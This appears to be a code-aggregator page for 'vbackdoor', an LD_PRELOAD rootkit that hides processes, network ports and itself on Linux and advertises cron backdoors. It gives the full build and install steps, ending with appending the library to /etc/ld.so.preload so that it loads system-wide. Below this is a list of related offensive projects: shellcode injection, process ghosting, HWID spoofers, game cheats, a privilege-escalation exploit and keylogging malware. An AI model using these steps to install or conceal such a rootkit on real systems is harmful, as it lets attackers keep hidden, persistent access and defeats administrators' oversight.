Hide a process,port,self under Linux using the ld_preload

Overview

vbackdoor

中文

Hide a process,port,self under Linux using the LD_PRELOAD rootkit.

compile the library

git clone https://github.com/veo/vbackdoor.git
cd vbackdoor
vi vbackdoor.c
make
sudo mv vbackdoor.so /usr/local/lib/

or

wget https://raw.githubusercontent.com/veo/vbackdoor/main/vbackdoor.c
vi vbackdoor.c
gcc -Wall -fPIC -shared -o vbackdoor.so vbackdoor.c -ldl
sudo mv vbackdoor.so /usr/local/lib/

Load it with the global dynamic linker

echo /usr/local/lib/vbackdoor.so >> /etc/ld.so.preload
  • Process hiding
  • LD_PRELOAD hiding
  • Network hiding
  • cron Backdoors
Owner
veo
Hippies love LSD, VEO love freedom 😈
veo
LD_PRELOAD Rootkit

LD_PRELOAD Rootkit

ACM | CSI IEM 2 Nov 29, 2021
Inject dll to explorer.exe and hide file from process.

Hide-FS Inject dll to explorer.exe and hide file from process. Requierments: Microsoft Detours Library - https://github.com/microsoft/Detours Compile:

null 12 Jun 17, 2022
Process Ghosting - a PE injection technique, similar to Process Doppelgänging, but using a delete-pending file instead of a transacted file

Process Ghosting This is my implementation of the technique presented by Gabriel Landau: https://www.elastic.co/blog/process-ghosting-a-new-executable

hasherezade 457 Jun 21, 2022
A self-contained minimal library for interacting with Linux hot-plug events

libue Zero dependency minimal library for interacting with Linux hot-plug events. Installation Just drop the header file into your C project. Usage #i

QP Hou 20 Feb 10, 2022
Hide skip button in cutscenes in Max Payne 3

MaxPayne3.FusionFix This is a small project intended to add ability to hide button in Max Payne 3. Additionally, added an option to increase the size

Sergey P. 24 May 30, 2022
A program that allows you to hide certain windows when sharing your full screen

Invisiwind Invisiwind (short for Invisible Window) is an application that allows you to hide certain windows when sharing your full screen.

Joshua T. 56 May 25, 2022
Hide SMBIOS/disk/NIC serials from EFI bootkit

Rainbow Rainbow is a bootkit like HWID spoofer for Windows. It abuses several hooks in EFI runtime services and uses clever DKOM to hide hardware seri

Samuel Tulach 159 Jun 22, 2022
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.

Thread Stack Spoofing PoC A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to byp

Mariusz B. 610 Jun 27, 2022
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

HOLLOW - Cobalt Strike BOF Authors: Bobby Cooke (@0xBoku) Justin Hamilton (@JTHam0) Octavio Paguaga (@OakTree__) Matt Kingstone (@n00bRage) Beacon Obj

Bobby Cooke 188 Jun 27, 2022
Solves a given NxN wordsearch in under 0.3 seconds at most using Rabin-Karp string algorithm.

ASSIGNMENT 2 The Information of the Creator: ASSIGNMENT 2 Author: Lukas Waschuk CCID: lwaschuk Date: 03-20-2021 The Purpose of Your Program: This prog

Lukas Waschuk 0 May 17, 2022
A self made free, open source internal cheat for Overwatch

Overwatch-Cheat A self made free, open source internal cheat for Overwatch How to use the Valorant Internal [+] - Download it, then compile the cheat

xEnething 6 May 5, 2022
A self made HWID Spoofer for Fortnite and Valorant. May also work in Warzone, Apex etc.

HWID-Spoofer A HWID-Spoofer made by me. Tested for Fortnite and Valorant. Really undetected in the moment How to use the Valorant Internal [+] - Downl

gupr0x4 12 Jun 6, 2022
Self driving car with obstacle detection and avoidance

STM32F4-Self-Driving-Car-Mini-Project Self driving car with obstacle detection and avoidance Hardware STM32F401RE Dev Board HCSR04 ultrasonic sensor (

Olaoluwa Raji 2 Jan 6, 2022
Node running standalone on PC, with interface - self-containing all dependencies

GMD Node Windows Application It is the GMD Node App for Windows packaged in a simple "one-click" installer containing all necessary dependencies. We a

Geoma COOP 3 Jan 4, 2022
Driver leap - Self-sustainable fork of SteamVR driver for Leap Motion controller with updated vendor libraries

Driver Leap Self-sustainable fork of SteamVR driver for Leap Motion controller with updated vendor libraries Installation (for users) Install Ultralea

null 42 Jun 17, 2022
Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation Usage Should work out of the box on Linux distributions based on U

Oliver Lyak 538 Jun 27, 2022
Protect files under a specific folder from deleting or moving by explorer.exe.

Explorer-Delete-Protection Protect files under a specific folder from deleting or moving by explorer.exe. Requierments: Microsoft Detours Library - ht

null 4 Jan 2, 2022
Interface between the Artery V2X Simulation Framework and DuT (Device under Test).

INFM HIL Interface Interface between the Artery V2X Simulation Framework and DuT (Device under Test). The Interface should support standards like: CAN

Laki 4 Dec 21, 2021
Orca - Advanced Malware with multifeatures written in ASM/C/C++ , work on all windows versions ! (some features still under developing and not stable)

About Orca Orca is an Advanced Malware with multifeatures written in ASM/C/C++ features Run in Background (Hidden Mode) Records keystrokes and saves t

anas 156 Jun 17, 2022